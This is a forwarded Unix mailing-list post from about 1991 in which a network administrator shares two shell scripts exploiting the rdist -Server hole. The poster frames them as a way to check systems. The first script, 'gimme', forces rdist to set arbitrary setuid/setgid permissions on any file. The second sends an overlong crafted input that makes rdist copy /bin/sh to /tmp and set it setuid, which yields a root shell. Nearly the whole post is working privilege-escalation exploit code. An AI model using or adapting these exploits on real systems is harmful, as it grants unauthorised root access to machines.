Figured I'd post them here first. This is nothing new, but it may provide clues to some of you on how to check for the rdist hole. ------ Dave Hayes - Institutional Network & Communications - JPL/NASA - Pasadena CA dave@elxr.jpl.nasa.gov dave@jato.jpl.nasa.gov ...usc!elroy!dxh Nasrudin went into a bank with a check to cash. "Can you identify yourself?" asked the clerk. Nasrudin took out a mirror and peered into it. "Yes, that's me alright." - ------cut here------ #! /bin/sh # GIMME - "gimme' a file" # Demonstrate rdist's ability to give me permission to access anything. # # gimme <pathname> [<permission> [<directory>]] # <pathname> is the target file. # <permission> is the octal mode to which the file access permission # should be set. Note that this may not be effective unless # either the SUID (4000) or SGID (2000) bits are also requested. # <directory> is the target directory for rdist to use if a hard # link is desired. Note that the user must have permission # to create this directory, it must be on the same filesystem # as the target file, and the target file must not be a # directory. This option is necessary to change the ownership # of the target if chown() of a symbolic link modifies the # link itself, and not the file it refers to. # # 1991.9.14 - Tsutomu Shimomura, Los Alamos National Laboratory # tsutomu@no-sense.LANL.GOV dirname=gimme$$ deftemp=/tmp defperm=6777 if [ $1x = x ]; then echo "Usage: $0 <pathname> [<permission> [<directory>]]" >&2 exit 1 fi if [ $2x != x ]; then perm=$2 else perm=$defperm fi if [ $3x != x ]; then link="ln" temp=$3/$dirname target=$1 else link="ln -s" temp=$deftemp/$dirname case $1 in /*) target=$1 ;; *) target=`pwd`/$1 ;; esac fi trap "rm -fr $temp; exit 1" 1 2 15 umask 66 mkdir $temp; if [ $? != 0 ]; then exit 1 fi set `whoami` $LOGNAME user=$1 set daemon `groups` while [ $# != 1 ]; do shift done group=$1 ( echo "t$temp/something" echo "R0 $perm 1 0 $user $group " while [ ! -f $temp/rdist* ]; do sleep 1 done set $temp/rdist* rm -f $1 if $link $target $1 >&2; then echo "" | dd bs=3 conv=sync 2>/dev/null echo "" echo 0 > $temp/status else echo 1 > $temp/status fi exit ) | rdist -Server status=`cat $temp/status` rm -fr $temp exit $status - ------cut here------ #!/bin/sh SUID=/tmp/foosh cat <<_EOF_ > test Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! aaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaaa Qaaaaaaaaaaaaaaaaaaaaaaa Scp /bin/sh $SUID Schmod 4755 $SUID _EOF_ cat test | /usr/ucb/rdist -Server localhost rm -rf test if [ -f $SUID ]; then echo "$SUID is a setuid shell. " fi ------- End of Forwarded Message